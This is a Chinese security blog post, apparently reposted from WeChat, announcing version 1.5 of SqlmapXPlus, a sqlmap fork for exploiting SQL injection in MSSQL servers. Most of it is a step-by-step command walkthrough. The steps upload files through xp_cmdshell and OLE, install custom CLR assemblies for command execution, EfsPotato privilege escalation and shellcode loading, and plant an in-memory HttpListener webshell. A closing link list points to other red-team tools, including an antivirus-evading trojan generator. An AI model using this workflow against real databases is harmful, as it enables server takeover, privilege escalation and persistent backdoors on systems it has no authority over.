MSSQL注入利用工具更新速览 v1.5

2024年5月9日11:33:23评论3 views字数 3949阅读13分9秒阅读模式

赛博大作战中的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！

1 简介

sqlmapxplus 基于sqlmap，参考各种解决方法，增强MSSQL数据库注入的利用方式

工具地址：https://github.com/co01cat/SqlmapXPlus 前版本的使用说明：https://mp.weixin.qq.com/s/nTYPKnl9XQLWhZ43sQV3xw

2 更新概述

发现问题：1. 针对实际网络过程中dll传输损失导致clr安装失败的问题（临时解决方法）   发现在原--install-clr功能中使用的clr dll太大，在实战中往往需要注   入的大量次数，如果注入过程中的某一次出现错误，会导致dll落地失败，无法成功打入dll，   现将原本一键自动安装的流程去除，修改为用户需要根据实际的目标情况，自定义的dll安装   临时增加 --check-file 选项判断dll文件是否成功落地目标主机   临时增加--check-clr 判断用户自定义函数是否在数据库中加载成功2. 为什么使用上传过程中会出现dll放大的问题   转换为十六进制落地再还原导致的文件增大，如字母 A 经过十六进制 会转换 为 41，则增大一倍3. 自定义clr的问题（已完成）   install-clr修改为，需要指定自定义的clr.dll路径，在提示框输入 用户自定义类名 用户自定义方法名   clr_shell模式下执行clr函数的方式修改为：用户自定义function 传入参数（已完成）更新内容：  新增开启ole功能  新增指定文件读取功能  新增指定文件移动功能  新增指定文件复制功能  新增指定文件删除功能  新增指定文件位置判断功能  新增存储过程查询功能  新增删除存储过程功能  修改ole上传方式  修改clr安装流程  修改clr命令执行方式  去除中文注释导致的报错更新功能： File system access:--xp-upload   upload file by xp_cmdshell --ole-upload  upload file by ole --check-file  use xp_fileexis check file exist --ole-del      delete file by ole --ole-read    read file content by ole --ole-move    move file by ole --ole-copy    copy file by ole Operating system access:--enable-clr        enable clr --disable-clr       disable clr--enable-ole        enable ole --check-clr   check user-defined functions in the database--del-clr   delete user-defined functions in the database--install-clr       install clr--clr-shell         clr shell --sharpshell-upload1  sharpshell upload1--sharpshell-upload2  sharpshell upload2

使用介绍

# 关于ole的功能介绍about ole:# 开启 ole 利用功能python sqlmap.py -r/-u xxx --enable-ole # 通过 ole 上传文件python sqlmap.py -r/-u xxx --ole-upload local_file_path --file-dest remote_file_path# 通过 ole 删除指定文件python sqlmap.py -r/-u xxx --ole-del remote_file_path# 通过 ole 阅读指定文件python sqlmap.py -r/-u xxx --ole-read remote_file_path# 通过 ole 移动并重命名文件python sqlmap.py -r/-u xxx --ole-move remote_file_path1 --file-dest remote_file_path# 通过 ole 复制文件python sqlmap.py -r/-u xxx --ole-copy remote_file_path1 --file-dest remote_file_path2# 通过 ole 实现的HttpListener内存马上传方式# 默认上传至c:Windowstaskslisten.tmp.txt，需要以system权限运行python sqlmap.py -r/-u xxx --sharpshell-upload2# 相关功能介绍other function:# 通过 xp_cmdshell 上传文件python sqlmap.py -r/-u xxx --xp-upload local_file_path --file-dest remote_file_path# 使用 xp_fileexis 来检查文件是否存在python sqlmap.py -r/-u xxx --check-file remote_file_path# 查询数据库中是否存在用户自定义函数python sqlmap.py -r/-u xxx --check-clr clr_function_name# 删除用户自定义函数python sqlmap.py -r/-u xxx --del-clr clr_function_name# 通过 xp_cmdshell实现的HttpListener内存马上传方式# 默认上传至c:Windowstaskslisten.tmp.txt，需要以system权限运行python sqlmap.py -r/-u xxx --sharpshell-upload1# 关于clr的功能介绍about clr:# 开启 clr 利用功能python sqlmap.py -r/-u xxx --enable-clr # 关闭 clr 利用功能python sqlmap.py -r/-u xxx --disable-clr# 进入 clr 安装模式python sqlmap.py -r/-u xxx --install-clr# 进入 clr-shell 命令交互模式python sqlmap.py -r/-u xxx --clr-shell# clr dll 参考如下，更多其他dll请参考星球获取# 存储过程类名Xplus，存储过程函数名需要注意大小写，分别为# ClrExec、ClrEfsPotato、ClrDownload、ClrShellcodeLoader# 对应项目目录下单独功能的dll，分别为clrexec.dllclrefspotato.dllclrdownload.dllclrshellcodeloader.dl

常用场景举例

根据目标情况，选择自己修改好合适大小的clr dll通过文件上传至目标主机

python sqlmap.py -r/-u xxx --random-agent --xp-upload clrdemo.dll --file-dest c:windowstasksclrexec.dll

MSSQL注入利用工具更新速览 v1.5

通过--check-file检查dll是否成功落地，通过注入传输不稳定将导致失败，有时需要多打几次

python sqlmap.py -r/-u xxx --random-agent --check-file c:windowstasksclrexec.dll

MSSQL注入利用工具更新速览 v1.5

看到提示目标文件存在，就可以进行下一步

加载远程dll，输入远程dll路径、用户自定义存储过程的相关信息

python sqlmap.py -r test.txt --random-agent --enable-clrpython sqlmap.py -r/-u xxx --random-agent --install-clr

MSSQL注入利用工具更新速览 v1.5

CLR程序集名称可以任意，通过--check-clr检查自定义存储过程是否加载成功

python sqlmap.py -r/-u xxx --random-agent --check-clr clrexec

MSSQL注入利用工具更新速览 v1.5

看到提示自定义存储过程存在数据库中，就可以进行下一步

进入clr-shell模式，执行自定义clr存储过程，所有执行均为无回显执行，需要自行判断执行是否成功

python sqlmap.py -r test.txt --random-agent --clr-shell

MSSQL注入利用工具更新速览 v1.5

input procedure name> 用户自定义存储过程名称

# 运行打入的ClrExecinput procedure name> ClrExecclr-shell>clr_exec whoami > c:windowstasks111.txt# EfsPotato同理打入目录下的clrefspotato.dll后input procedure name> ClrEfsPotato clr-shell>clr_efspotato whoami > c:windowstasks222.txt

MSSQL注入利用工具更新速览 v1.5

如命令执行功能，可以通过输出重定向配合 --ole-read 获取回显

python sqlmap.py -r test.txt --random-agent --enable-olepython sqlmap.py -r/-u xxx --random-agent --ole-read c:windowstasks111.txt

MSSQL注入利用工具更新速览 v1.5

原文始发于微信公众号（WK安全）：MSSQL注入利用工具更新速览 v1.5

左青龙
微信扫一扫

右白虎
微信扫一扫

MSSQL注入利用工具更新速览 v1.5

推荐一款开源跨平台多级内网穿透工具

红队专用免杀木马生成Tools（CuiRi）

Pip3line：针对RawBytes修改和拦截的「瑞士军刀」

工具 | SnowShadow

SharpUserIP 获取服务器或域控登录日志

全平台系统开源免费抓包软件network_proxy_flutter

Thinkphp框架的图形化漏洞扫描工具 -- Tp_Attack_GUI（5月16日更新）

工具 | Packer-Fuzzer

工具推荐-CodeRunner & Lightly

yamot：一款功能强大的基于Web的服务器安全监控工具

发表评论

在线咨询

微信